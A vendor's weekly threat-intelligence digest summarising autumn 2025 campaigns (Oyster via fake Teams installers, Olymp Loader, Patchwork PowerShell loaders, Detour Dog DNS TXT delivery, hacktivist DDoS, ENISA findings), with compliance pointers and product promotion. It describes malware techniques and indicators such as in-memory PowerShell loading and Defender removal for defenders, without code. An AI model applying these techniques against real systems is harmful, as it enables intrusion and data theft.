DigiCert’s Open-Source Intelligence (OSINT) Report – September 26 – October 2, 2025

Fake Microsoft Teams Installers Push Oyster Malware via Malvertising 

(TLP: CLEAR) Hackers are abusing SEO poisoning and malvertising to distribute the Oyster backdoor through fake Microsoft Teams installers. Oyster, also known as Broomstick and CleanUpLoader, has been active since mid-2023 and is used by various cybercriminal campaigns, including ransomware groups like Rhysida, to gain initial access to corporate networks. In the latest campaign, identified by Blackpoint SOC, threat actors created a fake download site, teams-install[.]top, that appears in search engine results when users search for “Teams download.” Although the domain does not spoof Microsoft directly, it mimics the Teams site’s appearance and delivers a malicious file named MSTeamsSetup.exe, the same name used by Microsoft’s legitimate installer. The fake installer is code-signed with certificates from “4th State Oy” and “NRM NETWORK RISK MANAGEMENT INC” to increase its legitimacy. When executed, it drops a malicious DLL (CaptureService.dll) into the %APPDATA%\Roaming directory. Persistence is maintained via a scheduled task that executes the DLL every 11 minutes, ensuring the backdoor remains active. Oyster provides attackers with remote access, enabling command execution, payload deployment, file transfers, and data exfiltration. This campaign mirrors earlier fake software installers for Google Chrome and PuTTY that were also used to distribute Oyster. The attack highlights the ongoing abuse of search ads and trusted software brands to trick users, particularly IT administrators, into downloading malware. The tactic leverages user trust in search results and remains a powerful method for establishing footholds in enterprise environments.

(TLP: CLEAR) Comments: The Oyster backdoor campaign leveraging fake Microsoft Teams installers demonstrates how malicious actors continue to blend social engineering with technical abuse of trusted platforms to establish footholds in enterprise networks. By exploiting SEO poisoning and malvertising, attackers ensure their malicious download sites rank highly in search results or appear as ads, significantly increasing the likelihood of unsuspecting users—especially IT administrators—downloading them. What makes this campaign particularly effective is the combination of legitimacy cues: familiar filenames like MSTeamsSetup.exe and the use of code-signed certificates. These tactics exploit user trust in both the software brand and digital signatures, making detection by non-technical users—and even some security solutions—much more difficult. Once installed, the malware creates persistence through scheduled tasks, granting attackers remote access for command execution, file transfer, and payload deployment. This aligns with Oyster’s history of being used by ransomware operators like Rhysida, indicating its value as an initial access tool in broader attack chains. From a strategic perspective, this highlights how threat actors are increasingly abusing the software supply chain ecosystem indirectly by mimicking trusted tools. The reliance on search engines as vectors also underscores a shift in initial access tactics—attackers are prioritizing the manipulation of online trust systems over brute-force or direct exploit approaches. The campaign also raises concerns about scalability. Since SEO poisoning can be automated and replicated across countless tools (e.g., Teams, Chrome, PuTTY, WinSCP), Oyster’s delivery method could easily be adapted to target other widely used enterprise software. This, combined with the malware’s modular backdoor capabilities, positions it as a persistent enabler of ransomware campaigns and broader intrusions across corporate environments.

(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “Malicious software (malware) is prevented or detected and addressed.

An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware. The deployed anti-malware solution(s): 

• Detects all known types of malware. 
• Removes, blocks, or contains all known types of malware.

Any system components that are not at risk for malware are evaluated periodically to include the following: 

• A documented list of all system components not at risk for malware. 
• Identification and evaluation of evolving malware threats for those system components. 
• Confirmation whether such system components continue to not require anti-malware protection.

The frequency of periodic evaluations of system components identified as not at risk for malware is defined in the entity’s targeted risk analysis, which is performed according to all elements specified in Requirement 12.3.1.

Section 5.2 lays out requirements for malware detection and blocking across all devices in the Cardholder Data Environment. Every device inside of the CDE should have malware protection that is updated, monitored, and actions taken when an infection is detected.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), functions as a recursive/resolver DNS server that receives DNS queries either via forwarding from on-network resolvers or via an endpoint client. It then uses blocklists, domain categories, artificial intelligence, or a defined policy to determine if the domain should be allowed or blocked. Blocked user traffic is then sent to a sinkhole.

Source: https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-installers-push-oyster-malware-via-malvertising/

New Malware-as-a-Service Olymp Loader Promises Defender-Bypass with Automatic Certificate Signing

(TLP: CLEAR) Olymp Loader is a newly observed Malware-as-a-Service (MaaS) platform—notable for being written largely in Assembly—that surfaced on underground forums and Telegram in mid-2025 and has quickly matured into a feature-rich loader and crypter suite. Advertised by an author calling themselves OLYMPO, the product is pitched as Fully Undetectable (FUD) and offers modular components (credential stealers, crypters, privilege-escalation tools) plus automatic certificate signing, deep XOR module encryption, and UAC-Flood escalation. Outpost24 and other analysts have observed real-world deployments where binaries masquerade as legitimate software (NodeJs.exe via GitHub Releases, fake installers for OpenSSL/Zoom/PuTTY/CapCut) to improve distribution and reduce suspicion. Technically, Olymp implements a multi-stage infection flow: drop to AppData, spawn persistence via startup entries and PowerShell, perform process injection (LoadPE/code-cave techniques supporting x86/x64/.NET/Java payloads), and disable or exclude Windows Defender using a “Defender Remover” module. The offering includes a range of pricing tiers (reported $50–$200) that bundle Defender bypass/removal and optional customized injection services, lowering the barrier for mid-level criminals to deploy sophisticated implants. Overall, Olymp Loader represents a significant commercialization of low-level development skill (Assembly) into an accessible, evasive MaaS product that leverages developer trust and code-signing to complicate detection and increase enterprise exposure.

(TLP: CLEAR) Comments: Olymp Loader’s emergence signals a notable inflection point in MaaS commercialization: low-level engineering (Assembly) is being productized and offered to operators who lack deep systems expertise. The decision to implement critical components in Assembly suggests the authors prioritize compact, tightly controlled execution and obfuscation at the machine-code level—traits that complicate static detection and hamper automated analysis. Coupled with deep XOR encryption, custom shellcode (LoadPE/code-cave injection), and automated certificate signing, Olymp is designed to defeat both reputation-based controls and many signature/heuristic engines. Its distribution techniques—GitHub Releases, developer-trust masquerades, and fake installers for widely used tooling—convert developer ecosystems and searchability into an indirect supply chain vector, increasing the likelihood of high-value initial access to enterprise and developer environments. Commercial pricing and bundled defensive-bypass modules materially lower the barrier to entry, enabling mid-tier criminals to deploy advanced implants at scale; that economic model accelerates commoditization and increases the churn of distinct campaigns using the same loader. Technical breadth (support for x86/x64/.NET/Java payloads, Defender exclusion automation, UAC flood escalation) expands target scope and persistence longevity, making infected hosts useful for credential harvesting, lateral movement, RaaS chains, or inclusion in proxy/DDoS infrastructures. Finally, the project profile—small team with Assembly expertise offering turnkey FUD services—creates attribution ambiguity and resilience: even if individual operators are disrupted, the toolset and signed binaries can quickly be reused or forked by other criminal actors.

(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware.” Using a combination of agent-based and network-based detection, such as with a Protective DNS Solution, provides overlapping protection for conventional IT assets such as laptops, desktops, and some servers but also for non-standard IT assets such as IoT devices and some servers that cannot run anti-malware software. 

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), supports 4 distinct detection engines to provide Defense in Depth against malware and phishing and other abuses:

• The Lists Engine allows UltraDDR customers the ability to bring their own block lists and allow lists for FQDNs, domains, IP addresses, CIDR blocks, and registrars.
• The Categories Engine uses Digicert-provided Cyber Threat Intelligence feeds in 17 categories. Administrators can enable blocking on a category with just one button click.
• The Decision Engine uses a multi-petabyte adversarial infrastructure data lake and artificial intelligence techniques to determine if a previously unseen or recently changed domain is malicious in nature.
• The Ruleset Engine allows administrators the ability to build custom rules to augment and extend the other engines of UltraDDR.

Source: https://cybersecuritynews.com/new-malware-as-a-service-olymp-loader/

NoName 057(16) Cyberattack Hits Finnish Government Websites

(TLP: CLEAR) The late September 2025 cyberattacks in Finland highlighted the ongoing threat posed by pro-Russian hacktivist group NoName 057(16). Over four consecutive days, the group conducted distributed denial-of-service (DDoS) attacks that disrupted access to Finnish government institutions and major political party websites. Targets included the Ministry of Defense, Ministry of the Interior, State Council, and Supreme Court, as well as parliamentary parties, demonstrating a deliberate attempt to undermine confidence in Finland’s digital infrastructure. Authorities confirmed that the group relied on massive traffic floods to overwhelm servers, a tactic that does not cause permanent damage but significantly disrupts operations. The Finnish Cybersecurity Center at Traficom noted that Finland has long been on NoName 057(16)’s “target list,” with this incident part of a broader campaign of coordinated digital offensives across Europe. The attacks come amid wider disruptions in Europe, with recent incidents at airports in Berlin and Brussels also attributed to pro-Russian groups. These campaigns align with Russia’s broader hybrid warfare strategy, which combines military, political, and cyber tactics to weaken NATO and EU resilience. Finland’s recent NATO accession and strong pro-Ukraine stance make it an especially visible target. By disrupting national institutions, NoName 057(16) aims to project Russian influence in Northern Europe, retaliate against Finland’s Ukraine support, and erode public trust in government systems. Although Finnish authorities restored services quickly, the attacks underscore the persistence of politically motivated cyber operations in Europe and the need for cross-border cooperation to counter long-term hybrid threats.

(TLP: CLEAR) Comments: The recent cyberattacks against Finland attributed to NoName 057(16) highlight how pro-Russian hacktivist groups continue to operate as part of Russia’s broader hybrid warfare strategy against NATO and EU members. Since its emergence in early 2022 following Russia’s invasion of Ukraine, NoName 057(16) has been one of the most visible cyber collectives supporting Kremlin narratives. It has consistently used distributed denial-of-service (DDoS) attacks to disrupt the websites of governments, media outlets, and financial institutions, often timing operations to coincide with geopolitical flashpoints such as sanctions, military aid to Ukraine, or NATO expansion. Finland’s recent accession to NATO and its strong pro-Ukraine policies make it a particularly symbolic target. By knocking government and political party websites offline for several days, NoName aimed not only to cause disruption but also to project Russian influence and undermine public trust in democratic processes. These operations rarely cause long-term technical damage, but they carry significant psychological and political weight, showcasing the ability of pro-Russian actors to paralyze digital infrastructure at will. The Finland incident also demonstrates how NoName 057(16) remains deeply intertwined with the ongoing Russia-Ukraine conflict, where cyber operations are leveraged alongside traditional military and information warfare. The persistence and propaganda-driven nature of the group underscores its role as a deniable asset for Moscow, using relatively simple but coordinated digital offensives to extend Russia’s reach beyond the battlefield.

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.IR-04: “Adequate resource capacity to ensure availability is maintained.” Businesses, particularly those located within NATO and allies, should maintain constant vigilance and regularly test and enhance their cybersecurity defensive capabilities, specifically DDoS mitigation strategies, architecture, monitoring, and procedures.

(TLP: CLEAR) DigiCert: Digicert UltraDDoS Protect provides proven and consistent DDoS protection for any of your assets whether they reside in the cloud, multi-cloud, data center, or hybrid. With always-on DDoS protection, you can stop a DDoS attack instantly, and more complex DDoS attacks and be mitigated within seconds.

Source: https://insightnews.media/noname-05716-cyberattack-hits-finnish-government-websites/

Scattered Spider, ShinyHunters Restructure – New Attacks Underway

(TLP: CLEAR) A new Resecurity report has revealed an ongoing global cybercrime campaign involving the notorious LAPSUS$, ShinyHunters, and Scattered Spider, collectively dubbed the “Trinity of Chaos.” Despite earlier claims of disbanding, these groups are still active, orchestrating coordinated hacks and extortion campaigns against leading enterprises across multiple industries. Analysts warn that the true scale of breaches is much larger than what has been disclosed publicly, with numerous private extortion attempts underway targeting Fortune 100 firms as well as organizations in financial services, aviation, retail, and automotive sectors. High-profile incidents tied to these groups include attacks on Qantas, AT&T, Salesforce, Jaguar Land Rover (JLR), Marks & Spencer, and Co-op. The UK’s Cyber Monitoring Centre has classified the Marks & Spencer and Co-op breaches as Category 2 events, estimating financial losses between £270M–£440M. In response to the disruptive JLR cyberattack, the UK government announced a £1.5 billion ($2 billion) loan guarantee for the automaker. Resecurity emphasizes that these threat actors are leveraging their notoriety to pressure victims into silence, using ongoing extortion to prevent disclosure of further breaches. Their operations demonstrate a dangerous evolution of “Gen Z” cybercrime groups, blending high-profile data theft with reputational coercion. The report suggests that the “Trinity of Chaos” is likely to continue expanding its influence, with more victims and compromised data expected to surface in the coming months.

(TLP: CLEAR) Comments: The resurgence of activity by the so-called “Trinity of Chaos”—LAPSUS$, ShinyHunters, and Scattered Spider—marks a dangerous phase in the evolution of global cybercrime. These groups are no longer operating in isolation but instead appear to be coordinating in ways that amplify their collective reach and impact. The blending of high-profile data theft with extortion tactics against Fortune 100 companies and critical industries such as financial services, aviation, and automotive underscores their ability to exploit both technical vulnerabilities and reputational pressure points. Historically, LAPSUS$ has specialized in social engineering and high-profile breaches, ShinyHunters in large-scale data theft and underground sales, and Scattered Spider in social engineering, SIM-swapping, and ransomware campaigns. By pooling these strengths, the alliance becomes a multifaceted threat capable of executing complex campaigns that overwhelm defenses across diverse sectors. The recent targeting of Jaguar Land Rover, Marks & Spencer, and Co-op illustrates this convergence of methods and the broadening of impact. This campaign also highlights the persistence of Gen Z-driven cybercrime groups who blend technical ability with bold, public-facing extortion strategies. Unlike more traditional financially motivated groups that operate quietly, the Trinity uses notoriety as a weapon, coercing victims into silence while amplifying their reputation. The financial impacts already visible in the UK—where breaches have triggered hundreds of millions in damages and even government loan guarantees—suggest these operations are far more than digital nuisances. If this trajectory continues, organizations should expect more aggressive campaigns, with alliances like this functioning as semi-structured cybercrime syndicates that blur the lines between hacktivism, criminal profiteering, and strategic disruption.

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events”. One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Detection Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), functions as a complement to anti-virus and Endpoint Detection and Response (EDR) agents to reduce the total amount of malware infections.

Source: https://securityaffairs.com/182799/cyber-crime/scattered-spider-shinyhunters-restructure-new-attacks-underway.html

Patchwork APT Using PowerShell Commands to Create Scheduled Task and Downloads Final Payload

(TLP: CLEAR) Since mid-2025 researchers have observed a renewed campaign by the Patchwork APT against government and telecommunications organizations across Asia and Eastern Europe. The intrusions begin with spear-phishing Office documents that execute embedded PowerShell when macros are enabled; the downloader now uses dynamic, multi-URL failover and randomized scheduled-task names to ensure persistence and evade network and endpoint detection. Operators stream secondary payloads into memory (IEX/Net.WebClient) and frequently load malicious DLLs via legitimate Windows binaries, enabling credential theft, lateral movement, and deployment of bespoke C2/backdoor frameworks. Victims commonly exhibit periodic CPU spikes and anomalous outbound HTTP requests tied to scheduled task execution. By abusing native Windows scheduling and in-memory execution, Patchwork minimizes forensic artifacts and complicates detection and response.

(TLP: CLEAR) Comments: Patchwork’s resurgence highlights the persistence and adaptability of long-running APT groups. Despite being exposed multiple times over the past decade, the group continues to evolve its tactics, techniques, and procedures (TTPs) to remain effective. The move from static URLs to multi-URL failover and randomized scheduled tasks illustrates a deliberate attempt to outpace signature-based and static defense measures. This reflects broader trends across APT operations where reliance on fileless malware, living-off-the-land techniques, and in-memory execution is increasingly common to bypass endpoint security. The group’s emphasis on persistence through scheduled tasks and PowerShell-based loaders also demonstrates how attackers prioritize stealth and long-term footholds over noisy smash-and-grab intrusions. By blending with native Windows processes and creating task names that mimic legitimate services, Patchwork increases the difficulty of attribution and detection. Their multi-stage infection chain, culminating in custom C2 frameworks and lateral movement, shows they are not opportunistic actors but strategic operators seeking to extract intelligence and maintain covert access for extended periods. The geographic targeting of government and telecommunications entities across Asia and Eastern Europe reflects both the group’s regional focus and the strategic value of these sectors. Access to such networks could allow for intelligence collection, disruption of communications, or staging of future campaigns. From a defensive perspective, this activity underscores the ongoing importance of behavioral monitoring, anomaly detection, and proactive threat hunting, since traditional controls like URL blocklists or antivirus are increasingly insufficient against sophisticated adversaries like Patchwork.

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website categories feeds.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations.

Source: https://cybersecuritynews.com/patchwork-apt-using-powershell-commands/

New DNS Malware Detour Dog Delivers Strela Stealer Using DNS TXT Records

(TLP: CLEAR) Researchers have uncovered a large-scale DNS-based malware campaign—tracked as Detour Dog—that leverages thousands of compromised websites worldwide to deliver the Strela Stealer information-stealer. Rather than relying on traditional HTTP-only distribution, operators use DNS TXT records as a covert command-and-control and delivery channel: infected sites generate structured DNS queries that embed victim metadata (host, visitor IP, random token, type) to actor-controlled name servers, and TXT responses (often Base64-encoded) include “down” instructions that cause the site to fetch and relay payloads (e.g., script.php/file.php) from StarFish C2 infrastructure. The network applies conditional filtering (by geolocation and device) to limit exposure, and recent upgrades added remote-code execution capabilities on compromised hosts for multi-stage delivery. Infoblox and sinkhole data show the operation’s scale and resilience—roughly 30,000 unique domains across hundreds of TLDs and the ability to pivot C2 domains within hours after sinkholing. Originating as redirect-to-scam activity in 2023, Detour Dog has evolved into a stealthy distributed delivery platform that obscures malware provenance and complicates detection because DNS TXT traffic is infrequently monitored with the rigor applied to other channels.

(TLP: CLEAR) Comments: The Detour Dog campaign underscores how threat actors are increasingly exploiting overlooked parts of internet infrastructure—in this case DNS—to build resilient malware delivery systems. By abusing TXT records, which are rarely inspected by traditional defenses, the operators have created a covert channel for both command-and-control and payload distribution. This technique makes attribution and takedown significantly harder, since the malicious infrastructure blends into normal DNS activity, which is foundational to internet communication. The pivot from scam redirects to direct malware delivery, particularly Strela Stealer, illustrates a strategic evolution toward financially motivated operations with broader impact. The infrastructure’s resilience—rapidly replacing C2 domains when sinkholed—shows careful planning and an ability to sustain operations at scale. The global distribution of more than 30,000 infected domains highlights both the effectiveness of the compromise and the difficulty of dismantling such a widely dispersed system. Of particular concern is how this DNS-based model can be extended beyond infostealers to more disruptive threats, including botnet formation for DDoS operations or delivery of wipers and ransomware. By embedding victim metadata in DNS queries and filtering based on geography and device, Detour Dog can tailor attacks to maximize impact while reducing exposure. This approach represents a maturing trend where DNS is weaponized not just for tunneling but as a full-fledged backbone of cybercriminal infrastructure, complicating detection and raising the bar for defenders.

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “The Domain Name System (DNS) is central to the operation of modern networks, translating human-readable domain names into machine-usable Internet Protocol (IP) addresses. DNS makes navigating to a website, sending an email, or making a secure shell connection easier, and is a key component of the Internet’s resilience. As with many Internet protocols, DNS was not built to withstand abuse from bad actors’ intent on causing harm. ‘Protective DNS’ (PDNS) is different from earlier security-related changes to DNS in that it is envisioned as a security service – not a protocol – that analyzes DNS queries and takes action to mitigate threats, leveraging the existing DNS protocol and architecture.”

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories including botnet Command and Control (C2) as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.Source: https://cybersecuritynews.com/new-dns-malware-detour-dog/

Phishing Dominates EU-Wide Intrusions, says ENISA 

(TLP: CLEAR) The ENISA Threat Landscape 2025 report highlights how phishing and vulnerability exploitation dominate initial access techniques in cyberattacks against EU organizations. Based on 4,875 incidents between July 2024 and June 2025, phishing accounted for 60% of intrusions, while exploitation of vulnerabilities made up 21%. Botnets (10%) and malicious applications (8%) followed, with nearly 70% of these intrusions leading to malware deployment. Outdated mobile devices and operational technology systems were flagged as high-value targets, while AI-powered phishing has surged, representing over 80% of global social engineering activity by early 2025. The report also underscores a shift toward targeting digital supply chain dependencies, where disruption at one node cascades across critical services. A notable example was the ransomware incident at Collins Aerospace that disrupted European airports, demonstrating the systemic risks. In terms of attack volume, DDoS dominated with 77% of reported incidents, though only a small fraction caused service disruption. Hacktivism emerged as the leading threat actor type, linked to 79% of attacks, often tied to geopolitical events, particularly Russian groups such as NoName057(16) leveraging the DDoSia platform. Activity frequently spiked during elections and moments of EU support for adversarial causes. Public administration was the most targeted sector (38%), largely impacted by hacktivist and state-sponsored campaigns. ENISA also warns of the growing challenge of attribution due to the blending of hacktivism and state-sponsored activity, as well as cases of “faketivism,” where state actors masquerade as hacktivists to obscure their role.

(TLP: CLEAR) Comments: The ENISA Threat Landscape 2025 report offers several critical insights into how cyber threats against EU organizations are evolving, with implications that extend well beyond the region. Phishing’s dominance as the leading initial access vector (60%) underscores how social engineering remains one of the weakest links in enterprise defenses. The fact that AI now drives over 80% of global phishing activity highlights the scalability and sophistication threat actors are achieving, allowing them to create tailored lures that bypass traditional detection at alarming speed. Vulnerability exploitation as the second most common access method (21%) reflects how patch management and legacy systems remain systemic risks, particularly in operational technology and mobile environments. The report also makes clear that DDoS is no longer just noise but a central instrument of hacktivism, accounting for 77% of attacks. Even if most did not cause lasting disruption, their sheer frequency reflects how low-cost botnets—often enabled by insecure IoT devices—continue to empower politically motivated campaigns. Russian-linked NoName057(16) and its DDoSia platform epitomize this shift, showing how hacktivism can be organized, persistent, and closely tied to geopolitical flashpoints such as elections or EU foreign policy moves. Finally, attribution is becoming more complex as the boundaries blur between state-backed campaigns and “faketivism.” This ambiguity benefits state actors who can mask strategic attacks under the guise of activism, while still inflicting reputational and operational damage on EU institutions. The heavy targeting of public administration (38%) demonstrates how adversaries are striking at symbolic, high-profile entities to amplify political messages and destabilize trust in governance.

(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware.” Using a combination of agent-based and network-based detection, such as with a Protective DNS Solution, provides overlapping protection for conventional IT assets such as laptops, desktops, and some servers but also for non-standard IT assets such as IoT devices and some servers that cannot run anti-malware software.

NIST Cybersecurity Framework (CSF) PR.DS-02: “The confidentiality, integrity, and availability of data-in-transit are protected” Organizations should have a well-defined incident response plan in place that outlines the procedures to take in a DDoS attack, including communication protocols and escalation procedures. Additionally, organizations should utilize DDoS mitigation services from reputable providers that detect and mitigate attacks in real time such as Digicert’s UltraDDoS Protect.

(TLP: CLEAR) DigiCert: Digicert UltraDDoS Protect provides flexible, automated, and always-on protection across 15 Points of Presence (PoPs) and >15Tbps of DDoS mitigation capacity to enable customer availability and performance under even the largest and most complex DDoS attacks (layer 3 through layer 7). An automated intelligence feed that is constantly updating mitigation devices allows protection against emerging attack vectors and common attack sources.

Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections.

Source: https://www.infosecurity-magazine.com/news/phishing-dominates-euwide/